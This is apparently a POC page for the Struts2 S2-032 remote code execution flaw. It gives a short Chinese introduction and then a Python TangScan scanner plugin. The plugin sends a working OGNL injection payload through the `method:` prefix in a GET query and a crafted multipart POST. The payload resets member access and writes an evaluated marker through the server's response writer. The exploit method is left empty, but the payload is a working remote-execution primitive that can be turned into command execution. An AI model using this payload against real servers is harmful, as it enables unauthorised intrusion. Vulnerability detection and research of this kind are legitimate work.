S2-032 远程命令执行 (POC@Tangscan)
前段时间很火的 S2-032 远程命令执行。下面的 POC 利用 Struts2 的 `method:` 动作前缀注入 OGNL 表达式：先重置 `_memberAccess`，再从上下文取出 HttpServletResponse，通过其 writer 输出 `88888888-1` 的求值结果；响应中出现 `88888887` 即说明表达式已被服务端执行（仅回显原始 payload 时不会出现该数字）。
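import re
import string
from StringIO import StringIO

from thirdparty import requests

from modules.exploit import TSExploit


# The OGNL payload asks the server to evaluate and print 88888888-1.  A merely
# reflected (unevaluated) payload contains "88888888-1", never "88888887", so
# the marker appearing anywhere in the body is evidence that OGNL ran.
_MARKER = '88888887'

# Per-request timeout in seconds; without one a hung or black-holed target
# stalls the whole scan.
_TIMEOUT = 10

# Browser-looking UA, used by both probes so they are indistinguishable to
# UA-based filtering.
_HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 '
                  '(KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36',
}

# OGNL expression, URL-encoded, appended to the target URL for the GET probe:
# re-enable member access, fetch the HttpServletResponse named by the rpsobj
# parameter from the context, print the marker through its writer, then
# flush/close so the marker is what comes back.
_OGNL_GET = (
    "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,"
    "%23w%3d%23context.get(%23parameters.rpsobj[0]),"
    "%23w.getWriter().println(88888888-1),"
    "%23w.getWriter().flush(),"
    "%23w.getWriter().close(),"
    "1?%23xx:%23request.toString"
    "&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest"
    "&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
)

# Same expression, raw, spliced in as a multipart field name for the POST probe.
# NOTE(review): the trailing "j" in `toStringj` differs from the GET form's
# `toString`; it appears to sit in the never-taken else operand of `1?#xx:...`,
# so it is kept verbatim rather than guessed at.
_OGNL_POST = (
    'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,'
    '#w=#context.get(#parameters.rpsobj[0]),'
    '#w.getWriter().println(88888888-1),'
    '#w.getWriter().flush(),'
    '#w.getWriter().close(),'
    '1?#xx:#request.toStringj'
)

# Placeholder field name that the form encoder is allowed to see; it is
# swapped for the raw OGNL after the multipart body has been built.
_PLACEHOLDER = 'xxoo'


class TangScan(TSExploit):
    """S2-032 (Struts2 ``method:`` prefix OGNL injection) detection plugin.

    ``verify`` sends a marker-printing OGNL expression first as a GET query
    string and, if that does not confirm, as a multipart POST field name, and
    reports the target as vulnerable when the evaluated marker comes back in
    the response body.  ``exploit`` is intentionally a no-op: this plugin only
    detects.
    """

    def __init__(self):
        # Explicit class in super(): self.__class__ would recurse forever if
        # this plugin were ever subclassed.
        super(TangScan, self).__init__()
        self.info = {
            "name": "S2-032 远程命令执行",
            "product": "",
            "product_version": "",
            "desc": """
                S2-032 远程命令执行
            """,
            "license": self.license.TS,
            "author": ["系统"],
            "ref": [
                {self.ref.wooyun: "http://zone.wooyun.org/content/26856"},
            ],
            "type": self.type.rce,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }

        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })

        self.register_result({
            "status": False,
            "data": {
            },
            "description": "",
            "error": ""
        })

    def verify(self):
        """Probe ``self.option.url`` and populate ``self.result``.

        Never raises: transport errors are recorded in ``self.result.error``
        and leave ``status`` False, so a dead or filtered host is reported as
        "not confirmed" instead of aborting the scan.
        """
        if self._probe_get() or self._probe_post():
            self.result.status = True
            self.result.description = "目标 {url} 存在st2命令执行".format(
                url=self.option.url
            )

    def _probe_get(self):
        """Send the URL-encoded payload as a query string.

        Returns True when the evaluated marker is found in the response body.
        """
        try:
            # verify=False / allow_redirects=False match the POST probe: the
            # target's certificate is irrelevant to the check, and following a
            # redirect would deliver the payload to a host outside the target.
            r = requests.get(
                self.option.url + _OGNL_GET,
                headers=_HEADERS,
                timeout=_TIMEOUT,
                verify=False,
                allow_redirects=False,
            )
        except Exception as e:  # best-effort probe: record, do not crash the scan
            self.result.error = str(e)
            return False
        return _MARKER in r.content

    def _probe_post(self):
        """Splice the raw payload into a multipart field name and POST it.

        Returns True when the evaluated marker is found in the response body.
        """
        try:
            data = {
                'reqobj': 'com.opensymphony.xwork2.dispatcher.HttpServletRequest',
                'rpsobj': 'com.opensymphony.xwork2.dispatcher.HttpServletResponse',
                _PLACEHOLDER: '1',
            }
            files = {'test': ('1.jpg', StringIO('1'))}
            req = requests.Request(
                'POST', self.option.url, headers=_HEADERS, data=data, files=files
            ).prepare()
            # The OGNL text cannot go through the form encoder untouched, so the
            # placeholder is replaced in the finished body and Content-Length is
            # recomputed to match the longer body.
            req.body = req.body.replace(_PLACEHOLDER, _OGNL_POST)
            req.headers['Content-Length'] = str(len(req.body))
            response = requests.Session().send(
                req, timeout=_TIMEOUT, verify=False, allow_redirects=False
            )
        except Exception as e:  # best-effort probe: record, do not crash the scan
            self.result.error = str(e)
            return False
        return _MARKER in response.content

    def exploit(self):
        """Detection-only plugin; no exploitation step is implemented."""
        pass


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())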